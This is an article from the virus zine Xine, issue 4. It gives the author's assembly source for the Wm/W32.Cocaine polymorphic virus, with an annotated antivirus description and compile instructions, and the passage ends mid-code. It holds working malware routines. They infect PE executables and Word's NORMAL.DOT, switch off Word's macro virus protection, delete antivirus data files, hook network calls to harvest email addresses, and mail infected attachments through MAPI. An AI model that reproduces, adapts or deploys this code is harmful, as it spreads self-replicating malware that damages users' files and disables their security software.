/-----------------------------\ | Xine - issue #4 - Phile 207 | \-----------------------------/ ;Wm/W32.Cocaine - 22231 bytes ;(c) Vecna 1999 ; ;This virus infect PE and DOC files. ; ;Study the code and the AVPVE description for others features. ; ;Small corrections in AVPVE text are between []'s ; ; ; ;AVPVE Description: ; ; Cocaine ; ; ------------------------------------------------------------------------ ; This is a parasitic Windows PE files and MS Word normal templates infector ; with email spreading ability, about 22Kb of length. The virus has three ; instances: in Windows PE EXE files, in Word NORMAL template and as attached ; file in email messages. ; ; The virus code in infected PE EXE files is its main instance. When it is ; executed, the virus searches for PE EXE files in the current and Windows ; directories and infects them. The virus also drops infected an NORMAL.DOT ; to the MS Word directory from its PE EXE instance, as well as sends ; infected emails. The virus instance in the NORMAL template drops and ; executes the infected PE EXE file on each document closing, and is not able ; to infect other documents and templates. [* Wrong. Check the infected doc I ; included, or the file MACRO.INC for the code *] The virus code in emails ; appears as attached file that is infected an PE EXE Windows executable file ; with a random name, or infected NORMAL template. ; ; The virus is per-process memory resident. This means that the virus copy ; may stay in memory for a long time until the infected application ; terminates. In case only "short-life" applications are infected, the virus ; code is not present in the system memory for long time. In case an ; application in permanent use is infected, the virus is active during a long ; time, hooks Windows functions, infects PE EXE files that are accessed and ; sends email messages. ; ; The virus is polymorphic in PE files as well as in Word NORMAL template. ; The virus has two polymorphic engines in its EXE code: the first of them ; generates polymorphic decryption loop in infected PE EXE files, the second ; one makes the virus macro program in infected NORMAL.DOT polymorphic too. ; ; The virus has a payload routine that is executed when an infected file is ; run after four months when it was infected. [* 8 months... Maybe AAM 12 ; confused AVers ;-) *] This routine displays message boxes that have the ; header "W32/Wm.Cocaine" and the text that is randomly selected from seven ; variants: ; ; Your life burn faster, obey your master... ; Chop your breakfast on a mirror... ; Veins that pump with fear, sucking darkest clear... ; Taste me you will see, more is all you need... ; I will occupy, I will help you die... ; I will run through you, now I rule you too... ; Master of Puppets, I'm pulling your strings... ; ; The virus pays attention to anti-virus programs and tries to disable them. ; Each time an infected file is executed and virus installs its per-process ; resident copy it looks for anti-virus data files in the current directory ; and deletes them. The names of these files look like follows: KERNEL.AVC, ; SIGN.DEF, FIND.DRV, NOD32.000, DSAVIO32.DLL, SCAN.DAT, VIRSCAN.DAT (AVP, ; DSAV, NOD, SCAN and other anti-virus data files). The virus also locates ; and terminates old version of AVP Monitor on-access scanner. [* Not so ; old ;-) *] ; ; The known virus version has bugs and cannot spread from Word macro instance ; to Windows executable. It also has a bug in PE EXE infection routine and ; corrupts some WinNT executable files. [* What can I say... is buggy :-) *] ; ; The virus has a "copyright" text: ; ; (c) Vecna ; ; Some virus routines (especially macro ones) are related to the "Fabi" ; multi-platform virus, and some infected files may be detected by the name ; of this virus. [* Probably, the loader, before it load the poly virus code, ; can be detected as Fabi *] ; ; Technical details ; ; The virus has quite large size for a program written in Assembler - about ; 22Kb, and has many routines that are quite interesting from a technical ; point of view. ; ; Running infected EXE ; ; When an infected file takes control the polymorphic decryption loops are ; executed. They decrypt the virus code layer-by-layer (the virus is ; encrypted by several loops - from two till five) and pass control to the ; virus installation routine. It is necessary to note that several virus ; blocks stay still encrypted. The virus decrypts and accesses them in case ; of need, and then encrypts back. These blocks are MS Word infection data ; and routine as well as PE EXE polymorphic engine. ; ; The virus installation routine looks for necessary Windows API functions ; addresses that are used by the virus later. The list of these functions is ; quite long, this is caused by list of things the virus does to spread ; itself. The functions list the virus looks for is below: ; ; Exported by Functions list ; ----------- -------------- ; KERNEL32.DLL: GetProcAddress GetModuleHandleA CreateProcessA ; CreateFileA WinExec CloseHandle LoadLibraryA FreeLibrary ; CreateFileMappingA MapViewOfFile UnmapViewOfFile ; FindFirstFileA FindNextFileA FindClose SetEndOfFile ; VirtualAlloc VirtualFree GetSystemTime ; GetWindowsDirectoryA GetSystemDirectoryA ; GetCurrentDirectoryA SetFileAttributesA SetFileTime ; ExitProcess GetCurrentProcess WriteProcessMemory WriteFile ; DeleteFileA Sleep CreateThread GetFileSize SetFilePointer ; USER32.DLL: MessageBoxA FindWindowA PostMessageA ; ADVAPI32: RegSetValueExA RegCreateKeyExA RegOpenKeyExA ; RegQueryValueExA RegCloseKey ; MAPI32.DLL: MAPISendMail ; ; The virus gets these functions' addresses by the standard Windows virus ; trick: it locates the image on KERNEL32.DLL in the Windows memory, scans ; its Export table and gets addresses of two functions: GetModuleHandle and ; GetProcAddress [* The import table is searched while infecting a file for ; GetModuleHandle *]. By using these two functions the virus is then able ; easily locate all addresses of other necessary functions. The most ; interesting feature of this routine is: this is the first virus that processes ; not only Win95/98 and WinNT addresses while looking for KERNEL32.DLL image, ; but pays attention for Win2000 addresses also [* If the host dont import ; GetModuleHandle this is *] ; ; The virus then locates and infects the MS Word, then searches for PE EXE ; files and also infects them, then hooks a set of system events (files and ; emails access) that is used to locate and infect more files as well as ; spread virus copy to the Internet in attached emails. ; ; Infecting MS Word ; ; The very first infection routine that is activated by the virus is its MS ; Word affecting routine, if it is installed in the system. First of all here ; the virus checks for C:\ANCEV.SYS file presence. ; ; The C:\ANCEV.SYS file ("ANCEV"="VECNA" written backward) has a special ; purpose. This file is created when the MS Word template infection routine ; completes. So, this file presence means that MS Word was located and ; NORMAL.DOT template was infected. In this case the virus while sending ; emails sends NORMAL.DOT template but not the infected EXE dropper [* I used ; to think that DOC files are less suspicious to send by email, but, after ; melissa's shits, EXE are better i gues *] ; ; So, the virus checks for this file at the very top of MS Word infection ; routine. If it does not exist, the virus continues infection. If this file ; is found, the virus randomly in one cases of ten continues infection, and ; in nine cases of ten leaves infection routine. This means that in one case ; of ten the MS Word NORMAL.DOT will be re-infected anyway [* This is done to ; avoid lamers creating a fake ANCEV.SYS to not have WinWord infected *]. ; ; The virus then disables the Word VirusWarning protection by modifying the ; system registry keys where Word stores its settings: ; ; SOFTWARE\Microsoft\Office\8.0\Word\Options, EnableMacroVirusProtection ; ; The virus then gets Word's templates directory also by reading system ; registry: ; ; SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates ; ; and deletes the NORMAL.DOT template in there, and then creates a new ; NORMAL.DOT template file - infected one. The infected NORMAL.DOT contains a ; small macro inside. This macro has "AutoExec" Word auto-name - it will be ; automatically executed on next Word startup and will import the main virus ; macro from the C:\COCAINE.SYS file. ; ; The C:\COCAINE.SYS file is created by the virus just after overwriting the ; NORMAL.DOT template. This SYS file is a text file that contains VBA ; program's source code. This source is extracted by the virus from its code, ; mixed with junk (polymorphic) VBA instructions and appended by infected PE ; EXE dropper converted to ASCII strings. ; ; So, the MS Word infection routine does its work in two steps. First of all ; the virus replaces the original NORMAL.DOT with a new one that contains the ; "AutoExec" macro program (loader) that imports complete virus code from the ; C:\COCAINE.SYS file, and completes by that porting virus code from PE EXE ; file to MS Word template. ; ; From Word to EXE ; ; To drop the PE EXE file from its Word template instance the virus uses a ; standard macro-viruses' trick. It creates two files: the first of them is ; the C:\COCAINE.SRC file with infected PE EXE file image converted to ASCII ; form, and second file is a DOS batch with random name. This batch file ; contains a set of instructions that execute the DOS DEBUG utility that ; converts ASCII dump back to binary PE EXE form, and executes it [* This is ; the worst imaginable way to drop a EXE file ever *] ; ; So the virus jumps to Windows out of infected Word template. ; ; Infecting PE EXE files ; ; When MS Word is affected, the virus goes to PE EXE files infection routine. ; The virus looks for PE EXE files in the current and Windows directories and ; infects them. The only files infected are those that have .EXE or .SCR ; filename extensions. ; ; The virus then looks for installed browser and mailer and infects them too. ; The virus locates them by system registry keys in HKEY_LOCAL_MACHINE ; storage: ; ; SOFTWARE\Classes\htmlfile\shell\open\command ; SOFTWARE\Classes\mailto\shell\open\command ; ; The virus needs these files to be infected for activating its Internet ; infection routines. When these Internet accessing applications are ; infected, the virus copy is active in the memory for a long time exactly at ; the moment a user is connected to the Internet. This is necessary to the ; virus to realize its Internet spreading ability. ; ; PE EXE Infection mechanism ; ; The virus checks several conditions before infecting the file. 1st: the ; file length has to be not divisible by 101 (it is virus protection to avoid ; multiple infection, the already infected PE EXE files have such length). ; 2nd: when the virus looks for EXE files in the current and Windows ; directories to infect them, the name of the file cannot contain 'V' letter ; or digits, here the virus avoids most popular anti-virus scanners and "goat ; files" infection. ; ; If the first section has big enough size (more than 2304 bytes), the virus ; writes to there several blocks of junk code that passes the control ; block-by-block to the main virus decryption loops. There are eight blocks ; written to files when the virus infects them: ; ; +------------+ ; | | ; |PE Header | ---------------+ ; +------------+ | ; | +-----+<-+| | ; | |Junk2| || | ; | +-----+-+|| Entry Point | ; |+-----+ |||<---------------+ ; ||Junk1| ||| ; |+-----+----+| ; | | | ; |+-----+<--+ | ; ||Junk3| | ; |+-----+----+| ; | V| ; | . . . | ; | +-----+| ; |+----|Junk8|| ; || +-----+| ; |V | ; |------------| ; |Virus code | ; | | ; +------------+ ; ; In this case the virus does not modify program's entry point address, but ; it needs to restore all overwritten blocks of host file before return ; control to original entry procedure [* CommanderBomber/OneHalf rulez *]. ; ; If the first section is short, the control goes directly to virus code. In ; this case the virus modifies program's entry address to get control when ; infected files are executed. ; ; The virus code itself is encrypted by several (from two till five) ; polymorphic loops. The polymorphic engine in the virus is quite strong, and ; produces about 2Kb of polymorphic loops [* This poly is kewl *] ; ; The virus also patches the Import section to get functions GetProcAddress, ; GetModuleHandle, CreateProcessA, WinExec and MAPISendMail when infection ; executable is run. ; ; After all the virus writes its encrypted code to the end of last file ; section, and increases section size by patching PE header. ; ; Intercepting Events ; ; When the Word and PE EXE direct infection routines are complete, the virus ; hooks several Windows functions and stays in Windows memory as part of the ; host program. The virus hooks two file access function WinExec and ; CreateProcessA, if they are imported by the host program from the ; KERNEL32.DLL. When these functions get control (a program is executed) the ; virus gets the program's file name, gets its directory, searches and ; infects PE EXE files in this directory. ; ; Sending Emails ; ; The virus per-process resident code also runs email infection thread, hooks ; MAPISendMail that is exported from MAPI32.DLL, "connect" and "recv" from ; WSOCK32.DLL and GetProcAddress from KERNEL32.DLL. ; ; The first hook is used by the virus to send its copy to the Internet. When ; the virus intercepts this event it looks for attached data in the message. ; If there is no attach, the virus appends to the message infected NORMAL.DOT ; or infected PE EXE file (the latter is created on the disk in the ; C:\ENIACOC.SYS file). ; ; The "GetProcAddress", "connect" and "recv" hooks are used by the virus to ; realize second method of infected Emails sending. When a message arrives, ; the virus scans its header for "mailto:" field, gets the address from there ; and stores it in its own database. [* MAILTO: is a HTML command/instruction ; used very often. Nice idea :-) *] ; ; When taking control the infection thread looks for email address caught by ; "connect" and "recv" hooks, calculates its CRC and compares with its ; "already infected addresses" database that is stored in the BRSCBC.DAT file ; in the Windows system directory. If this address was not used yet, the ; virus adds it to its BRSCBC.DAT database, creates a message with NORMAL ; template or infected PE EXE file, and sends it by using MAPISendMail ; function [* Why BRSCBC? ;-) *]. The subject field for the message is ; randomly selected from variants: ; ; Kewl page! ; Improvement to your page ; Your page r0x0r! ; You must see this... ; Secret stuff! ; [* or a empty subject line *] ; ; By using the BRSCBC.DAT database the virus avoids duplicate sendings, but ; on each infected program run the virus depending on its random counter ; deletes this file, and clears "do-not-send" database by that. ; ; The "GetProcAddress" that is also hooked by virus TSR copy is used only to ; intercept "connect" and "recv" WSOCK32.DLL functions, if an application ; does not import these routines "by default", but activates them in case of ; need. To do that the "GetProcAddress" virus' hook intercepts accesses to ; "connect" and "recv" WSOCK32.DLL functions' addresses. If an application ; tries to get addresses of these routines to use Internet connections, the ; virus returns addresses of its own "connect" and "recv" hookers, and so ; intercepts Internet connection [* Fucking OPERA *] ;Thnz to IkX for accepting this contribution ;Greetz to Z0MBiE, VirusBuster and Reptile(the first to use macro autoload) ;Special greetz goes to Jacky Qwerty: ;Los virus no serian lo que son hoy si no fuera por vos! ;THNDV/CAP/Cabanas RULEZ! (THNDV solo para los mas vivos ;> ) ;Big fuckZ to T2000 and El Gusano Boliviano: lamers and ripperz!!!! ;Greetz to all creative coders ;Use the pre-compiled virus, but if you're a sort of 37337 d00d... to compile: ; TASM /M /ML COKE.ASM ; TLINK32 COKE,,,IMPORT32 ; PEWRSEC COKE.EXE ;Remember to split the big COKE.ASM in the smaller incz before! ;(and beware the trap ;> ) ;contacts: vecna_br@hotmail.com (except questions about compiling) .586p .model flat, STDCALL locals include host.inc ofs equ offset by equ byte ptr wo equ word ptr dwo equ dword ptr TRUE EQU 1 FALSE EQU 0 MAIL_DEBUG EQU FALSE DIRECT EQU TRUE MONTH_DELAY EQU 8 MAX_BRANCH EQU 8 ;beware DrWeb! (5 here=detect!) MAX_M_DEEP EQU 6 MAIL_PRIORITY EQU 10 ;seconds MAX_SOCK EQU 10 DIV_VALUE EQU 101 MAX_PATH EQU 260 MIN_RAW EQU (MAX_BRANCH+1)*100h vsize equ vend - vcode msize equ mend - vcode _VSEG segment dword use32 public 'COCAINE' IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE vcode label db '(c) Vecna', 0 FunDate db 0 ;month to activate InitWSOCK proc call @@1 wsock32 db 'WSOCK32.DLL', 0 @@1: call [ebp+(ofs _GetModuleHandle-ofs vcode)] test eax, eax jz @@0 call @@2 db 'connect',0 @@2: push eax call @@3 db 'recv', 0 @@3: push eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _recv-ofs vcode)], eax call [ebp+(ofs _GetProcAddress-ofs vcode)] mov [ebp+(ofs _connect-ofs vcode)], eax clc ret @@0: stc ret InitWSOCK endp http_install proc sub ecx, ecx call @@set_seh mov esp, [esp+8] call delta jmp @@fault @@set_seh: push dwo fs:[ecx] mov fs:[ecx], esp call InitWSOCK jc @@fault mov ebx, [ebp+(ofs _base-ofs vcode)] @@check: cmp wo [ebx], 'ZM' je @@found @@fault: sub ecx, ecx pop dwo fs:[ecx] pop ecx ret @@found: mov edi, [ebx+3ch] lea edi, [ebx+edi+128] mov edi, [edi] @@2: mov esi, [ebx+edi+12] test esi, esi jz @@ret add esi, ebx lodsd or eax, 20202020h cmp eax, 'cosw' je @@wsock add edi, 20 jmp @@2 @@wsock: mov esi, [ebx+edi+16] add esi, ebx @@searchloop: lodsd test eax, eax jz @@ret cmp eax, [ebp+(ofs _connect-ofs vcode)] jne @@3 lea eax, [ebp+(ofs New_connect-ofs vcode)] lea edi, [esi-4] mov ecx, 4 push esi push eax mov esi, esp ;fake buffer in stack call WriteMem pop esi pop esi @@3: cmp eax, [ebp+(ofs _recv-ofs vcode)] jne @@searchloop lea eax, [ebp+(ofs New_recv-ofs vcode)] lea edi, [esi-4] mov ecx, 4 push esi push eax mov esi, esp ;fake buffer in stack call WriteMem pop esi pop esi @@ret: jmp @@fault http_install endp NewGetProcAddress proc push esp pushad call delta mov eax, [ebp+(ofs _GetProcAddress-ofs vcode)] mov [esp+(7*4)+4], eax call InitWSOCK jc @@1 lea eax, [ebp+(ofs wsock32-ofs vcode)] push eax call [ebp+(ofs _GetModuleHandle-ofs vcode)] test eax, eax jz @@1 cmp [esp+(7*4)+12], eax jnz @@1 lea eax, [ebp+(ofs CheckWSOCK32-ofs vcode)] xchg [esp+(7*4)+8], eax mov [ebp+(ofs wsock_ret-ofs vcode)], eax @@1: popad ret NewGetProcAddress endp CheckWSOCK32 proc push ebp call delta cmp eax, [ebp+(ofs _connect-ofs vcode)] jne @@1 lea eax, [ebp+(ofs New_connect-ofs vcode)] jmp @@2 @@1: cmp eax, [ebp+(ofs _recv-ofs vcode)] jne @@2 lea eax, [ebp+(ofs New_recv-ofs vcode)] @@2: pop ebp push 12345678h wsock_ret equ dwo $-4 ret CheckWSOCK32 endp New_connect proc push esp pushad call delta mov eax, [ebp+(ofs _connect-ofs vcode)] mov [esp+(7*4)+4], eax mov esi, [esp+(7*4)+16] mov ax, wo [esi+2] ;port number cmp ax, 5000h ;80 jne @@1 mov eax, [esp+(7*4)+12] ;get socket mov ebx, [ebp+(ofs _socket-ofs vcode)] mov [ebp+(ofs socket-ofs vcode)+(ebx*4)], eax inc ebx cmp ebx, MAX_SOCK jne @@2 sub ebx, ebx @@2: mov [ebp+(ofs _socket-ofs vcode)], ebx @@1: popad ret New_connect endp delta proc call @@1 @@1: pop ebp sub ebp, (ofs @@1-ofs vcode) ret delta endp New_recv proc push esp pushad call delta mov eax, [ebp+(ofs _recv-ofs vcode)] mov [esp+(7*4)+4], eax mov eax, [esp+(7*4)+12] lea edi, [ebp+(ofs socket-ofs vcode)] mov ecx, MAX_SOCK repne scasd jecxz @@1 mov eax, [esp+(7*4)+16] mov [ebp+(ofs recv_buff-ofs vcode)], eax mov eax, [esp+(7*4)+20] mov [ebp+(ofs recv_size-ofs vcode)], eax lea eax, [ebp+(ofs New_recv2-ofs vcode)] xchg [esp+(7*4)+8], eax mov [ebp+(ofs recv_ret-ofs vcode)], eax @@1: popad ret New_recv endp New_recv2 proc pushad call delta mov eax, [ebp+(ofs email_w-ofs vcode)] test eax, eax jnz @@0 mov esi, [ebp+(ofs recv_buff-ofs vcode)] mov ecx, [ebp+(ofs recv_size-ofs vcode)] sub ecx, 8 @@1: push ecx push esi lodsd or eax, 20202000h cmp eax, 'iam"' jne @@2 lodsd or eax, 00202020h cmp eax, ':otl' jne @@2 lea edi, [ebp+(ofs email-ofs vcode)] lea ebx, [edi+127] @@4: lodsb cmp al, '"' je @@3 cmp al, '?' je @@3 cmp edi, ebx je @@3 stosb jmp @@4 @@3: sub eax, eax stosb dec eax mov dwo [ebp+(ofs email_w-ofs vcode)], eax @@2: pop esi inc esi pop ecx loop @@1 @@0: popad push 12345678h recv_ret equ dwo $-4 ret New_recv2 endp MailThread proc cld mov ebp, [esp+4] sub eax, eax call @@set_seh mov esp, [esp+8] call delta push -1 call [ebp+(ofs _Sleep-ofs vcode)] @@set_seh: push dwo fs:[eax] mov fs:[eax], esp @@main_loop: mov ecx, [ebp+(ofs email_w-ofs vcode)] test ecx, ecx jz @@no_queued lea esi, [ebp+(ofs email-ofs vcode)] push esi sub ecx, ecx cld @@1strlen: lodsb test al, al jz @@2strlen inc ecx jmp @@1strlen @@2strlen: mov edi, ecx pop esi call CRC32 mov [ebp+(ofs email_crc-ofs vcode)], eax call CheckList test eax, eax jnz @@done IF MAIL_DEBUG EQ TRUE sub ecx, ecx push 4 ;yes/no lea eax, [ebp+(ofs title1-ofs vcode)] push eax lea eax, [ebp+(ofs email-ofs vcode)] push eax push ecx call [ebp+(ofs _MessageBoxA-ofs vcode)] cmp eax, 7 ;no! je @@done ENDIF lea eax, [ebp+(ofs mapi-ofs vcode)] push eax call [ebp+(ofs _LoadLibraryA-ofs vcode)] test eax, eax jz @@done mov [ebp+(ofs _mapi-ofs vcode)], eax lea ecx, [ebp+(ofs sMAPISendMail-ofs vcode)] push ecx push eax call [ebp+(ofs _GetProcAddress-ofs vcode)] test eax, eax jz @@unload_mapi mov [ebp+(ofs _MAPISendMail-ofs vcode)], eax call OpenAncev jc @@file ;file dont exists, binary send @@doc: call GetTemplateDir @@1: lodsb test al, al jnz @@1 lea edi, [esi-1] lea esi, [ebp+(ofs ndot-ofs vcode)] @@3: lodsb stosb test al, al jnz @@3 lea esi, [ebp+(ofs directory-ofs vcode)] push 80h push esi call [ebp+(ofs _SetFileAttributesA-ofs vcode)] test eax, eax jz @@file mov edx, 'COD.' jmp @@attach @@file: call CreateDropper mov eax, [ebp+(ofs mm_on_off-ofs vcode)] push eax ;buffer mov eax, [ebp+(ofs fsizel-ofs vcode)] push eax ;size lea edi, [ebp+(ofs directory-ofs vcode)] push edi lea esi, [ebp+(ofs shitfile-ofs vcode)] @@4: lodsb stosb test al, al jnz @@4 mov dwo [ebp+(ofs wd_att-ofs vcode)], 82h call WriteDump ;hidden dump push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] mov edx, 'EXE.' @@attach: DATA_SIZE = size MapiMessage + ((size MapiRecipDesc)*2) + size MapiFileDesc mapimsg = 0 origin = mapimsg + size MapiMessage destin = origin + size MapiRecipDesc file = destin + size MapiRecipDesc sub eax, eax mov ecx, DATA_SIZE sub esp, ecx mov edi, esp mov esi, edi rep stosb ;clear buffers we'll use lea eax, [esi+origin] mov [esi.mapimsg.lpOriginator], eax lea eax, [esi+destin] mov [esi.mapimsg.lpRecips], eax lea eax, [esi+file] mov [esi.mapimsg.lpFiles], eax push 1 pop eax mov [esi.mapimsg.nFileCount], eax mov [esi.mapimsg.nRecipCount], eax mov [esi.destin.ulRecipClass], eax inc eax mov [esi.mapimsg.flags], eax lea eax, [ebp+(ofs email-ofs vcode)] mov [esi.destin.lpszName], eax mov [esi.destin.lpszAddress], eax lea eax, [ebp+(ofs directory-ofs vcode)] mov [esi.file.lpszPathName], eax lea edi, [ebp+(ofs fname-ofs vcode)] mov [esi.file.lpszFileName], edi call MakeVar mov eax, edx stosd sub eax, eax stosb mov eax, [ebp+(ofs subject-ofs vcode)] mov [esi.mapimsg.lpszSubject], eax call @@1aa db '', 0 @@1aa: pop [esi.mapimsg.lpszNoteText] sub eax, eax push eax push eax push esi push eax push eax call [ebp+(ofs _MAPISendMail-ofs vcode)] test eax, eax jnz @@33 sub eax, eax mov [ebp+(ofs mm_on_off-ofs vcode)], eax call InsertList @@33: add esp, DATA_SIZE lea eax, [ebp+(ofs shitfile-ofs vcode)] push eax call DeleteShitFile @@unload_mapi: mov eax, [ebp+(ofs _mapi-ofs vcode)] call [ebp+(ofs _FreeLibrary-ofs vcode)] @@done: sub eax, eax mov [ebp+(ofs email_w-ofs vcode)], eax @@no_queued: push MAIL_PRIORITY*1000 call [ebp+(ofs _Sleep-ofs vcode)] jmp @@main_loop MailThread endp GetTemplateDir proc call @@2 db 'SOFTWARE\Microsoft\Office\8.0\Common\FileNew\LocalTemplates', 0 @@2: pop eax call ConsultKey ret GetTemplateDir endp CreateDropper proc push 00000040h push 00002000h+00001000h+00100000h push 48*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] mov [ebp+(ofs mm_on_off-ofs vcode)], eax sub edi, edi xchg edi, eax call @@1 @@0: db04Dh, 05Ah, 050h, 000h, 000h, 000h, 002h, 000h db002h, 000h, 004h, 000h, 000h, 000h, 00Fh, 000h db000h, 000h, 0FFh, 0FFh, 000h, 001h, 000h, 0B8h db000h, 006h, 000h, 040h, 000h, 000h, 000h, 01Ah db000h, 021h, 000h, 001h, 000h, 001h, 000h, 0BAh db010h, 000h, 000h, 000h, 00Eh, 01Fh, 0B4h, 009h db0CDh, 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 090h db090h, 054h, 068h, 069h, 073h, 020h, 070h, 072h db06Fh, 067h, 072h, 061h, 06Dh, 020h, 06Dh, 075h db073h, 074h, 020h, 062h, 065h, 020h, 072h, 075h db06Eh, 020h, 075h, 06Eh, 064h, 065h, 072h, 020h db057h, 069h, 06Eh, 033h, 032h, 00Dh, 00Ah, 024h db037h, 000h, 087h, 000h, 050h, 045h, 000h, 001h db000h, 04Ch, 001h, 004h, 000h, 000h, 000h, 074h db025h, 0F5h, 00Eh, 000h, 007h, 000h, 0E0h, 000h db000h, 000h, 08Eh, 081h, 00Bh, 001h, 002h, 019h db000h, 000h, 000h, 002h, 000h, 002h, 000h, 006h db000h, 006h, 000h, 010h, 000h, 002h, 000h, 010h db000h, 002h, 000h, 020h, 000h, 003h, 000h, 040h db000h, 001h, 000h, 010h, 000h, 002h, 000h, 002h db000h, 001h, 000h, 001h, 000h, 006h, 000h, 003h db000h, 000h, 000h, 00Ah, 000h, 005h, 000h, 050h db000h, 002h, 000h, 004h, 000h, 005h, 000h, 002h db000h, 004h, 000h, 010h, 000h, 001h, 000h, 020h db000h, 003h, 000h, 010h, 000h, 001h, 000h, 010h db000h, 005h, 000h, 010h, 000h, 00Bh, 000h, 030h db000h, 001h, 000h, 054h, 000h, 01Bh, 000h, 040h db000h, 001h, 000h, 00Ch, 000h, 052h, 000h, 043h db04Fh, 044h, 045h, 000h, 004h, 000h, 002h, 000h db002h, 000h, 010h, 000h, 002h, 000h, 002h, 000h db002h, 000h, 006h, 000h, 00Dh, 000h, 020h, 000h db001h, 000h, 060h, 044h, 041h, 054h, 041h, 000h db004h, 000h, 002h, 000h, 002h, 000h, 020h, 000h db002h, 000h, 002h, 000h, 002h, 000h, 008h, 000h db00Dh, 000h, 040h, 000h, 001h, 000h, 0C0h, 02Eh db069h, 064h, 061h, 074h, 061h, 000h, 002h, 000h db002h, 000h, 002h, 000h, 030h, 000h, 002h, 000h db002h, 000h, 002h, 000h, 00Ah, 000h, 00Dh, 000h db040h, 000h, 001h, 000h, 0C0h, 02Eh, 072h, 065h db06Ch, 06Fh, 063h, 000h, 002h, 000h, 002h, 000h db002h, 000h, 040h, 000h, 002h, 000h, 002h, 000h db002h, 000h, 00Ch, 000h, 00Dh, 000h, 040h, 000h db001h, 000h, 050h, 000h, 067h, 003h, 06Ah, 000h db000h, 000h, 0E8h, 000h, 003h, 000h, 0FFh, 025h db030h, 030h, 040h, 000h, 0F3h, 003h, 028h, 030h db000h, 009h, 000h, 038h, 030h, 000h, 001h, 000h db030h, 030h, 000h, 015h, 000h, 046h, 030h, 000h db005h, 000h, 046h, 030h, 000h, 005h, 000h, 04Bh db045h, 052h, 04Eh, 045h, 04Ch, 033h, 032h, 02Eh db064h, 06Ch, 06Ch, 000h, 003h, 000h, 045h, 078h db069h, 074h, 050h, 072h, 06Fh, 063h, 065h, 073h db073h, 000h, 0ADh, 001h, 010h, 000h, 001h, 000h db00Ch, 000h, 002h, 000h, 009h, 030h @@1: pop esi mov ecx, ofs @@1-ofs @@0 @@2: lodsb stosb test al, al jnz @@3 dec ecx dec ecx lodsw push ecx xor ecx, ecx xchg ecx, eax jecxz @@4 rep stosb @@4: pop ecx @@3: loop @@2 mov [ebp+(ofs fsizeh-ofs vcode)], ecx mov dwo [ebp+(ofs fsizel-ofs vcode)], 4096 call Infect ret CreateDropper endp random_f proc push eax call random0 pop eax ret random_f endp macro_start equ this byte include ndot.inc MacroSpread proc sub ecx, ecx call @@set_seh mov esp, [esp+8] call delta jmp @@0 @@set_seh: push dwo fs:[ecx] mov fs:[ecx], esp call OpenAncev jc @@1 ;dont exists, macro spread mov eax, 10 call random or eax, eax ;just in case that we are jnz @@0 ;reinfecting @@1: call @@2 @@1v dd 0 @@2: push 000F003Fh ;KEY_ALL_ACCESS push 0 call @@3 db 'SOFTWARE\Microsoft\Office\8.0\Word\Options', 0 @@3: push 80000001H ;HKEY_CURRENT_USER call [ebp+(ofs _RegOpenKeyEx-ofs vcode)] test eax, eax jnz @@0 push 1 ;size call @@4 db '0', 0 @@4: push 1 ;type push 0 call @@5 db 'EnableMacroVirusProtection', 0 ;key entry @@5: push dwo [ebp+(ofs @@1v-ofs vcode)] call [ebp+(ofs _RegSetValueEx-ofs vcode)] push dwo [ebp+(ofs @@1v-ofs vcode)] call [ebp+(ofs _RegCloseKey-ofs vcode)] ;close key call GetTemplateDir cld push esi @@6: lodsb test al, al jnz @@6 lea edi, [esi-1] lea esi, [ebp+(ofs ndot-ofs vcode)] @@8: lodsb stosb test al, al jnz @@8 call DeleteShitFile push 00000040h push 00002000h+00001000h+00100000h push 48*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)];alloc memory for my normal.dot mov [ebp+(ofs mm_on_off-ofs vcode)], eax lea eax, [ebp+(ofs normaldot-ofs vcode)] push eax push normaldot_size mov eax, [ebp+(ofs mm_on_off-ofs vcode)] push eax lea eax, [ebp+(ofs normaldot_sized-ofs vcode)] push eax call lzrw1_decompress ;unpack normaldot mov eax, [ebp+(ofs mm_on_off-ofs vcode)] push eax mov eax, [ebp+(ofs normaldot_sized-ofs vcode)] push eax lea eax, [ebp+(ofs directory-ofs vcode)] push eax ;dump not hidden mov dwo [ebp+(ofs wd_att-ofs vcode)], 80h call WriteDump ;create/write new normal.dot push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from normal.dot call CreateDropper push 00000040h push 00002000h+00001000h+00100000h push 150*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] mov [ebp+(ofs dbgscript-ofs vcode)], eax mov edi, eax push eax mov esi, [ebp+(ofs mm_on_off-ofs vcode)] mov ecx, dwo [ebp+(ofs fsizel-ofs vcode)] call script ;make debug script push 00004000h+00008000h push 0 push dwo [ebp+(ofs mm_on_off-ofs vcode)] call [ebp+(ofs _VirtualFree-ofs vcode)] ;free memory from EXE dropper pop eax sub edi, eax mov [ebp+(ofs dbgscript_size-ofs vcode)], edi push 00000040h push 00002000h+00001000h+00100000h push 4*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text mov [ebp+(ofs mm_on_off-ofs vcode)], eax lea eax, [ebp+(ofs macros-ofs vcode)] push eax push macro_size mov eax, [ebp+(ofs mm_on_off-ofs vcode)] push eax lea eax, [ebp+(ofs macro_sized-ofs vcode)] push eax call lzrw1_decompress ;unpack normaldot mov ecx, [ebp+(ofs macro_sized-ofs vcode)] mov esi, [ebp+(ofs mm_on_off-ofs vcode)] lea edi, [esi+ecx+4] ;edi=buffer for vars mov [ebp+(ofs variables-ofs vcode)], edi mov ebx, edi @@9: lodsb cmp al, 'A' jb @@10 cmp al, 'Z' ja @@10 call random_f jc @@10 sub al, 'A'-'a' @@10: mov [esi-1], al loop @@9 mov ecx, 10 ;generate variables @@13: push ecx mov eax, 8 ;lenght of the name of variable call random inc eax inc eax mov ecx, eax @@12: mov eax, 'Z'-'A' call random add al, 'A' call random_f jc @@11 sub al, 'A'-'a' @@11: stosb loop @@12 sub eax, eax stosb pop ecx loop @@13 ;next variable push 00000040h push 00002000h+00001000h+00100000h push 4*1024 push 0 call [ebp+(ofs _VirtualAlloc-ofs vcode)] ;alloc memory for macro text push 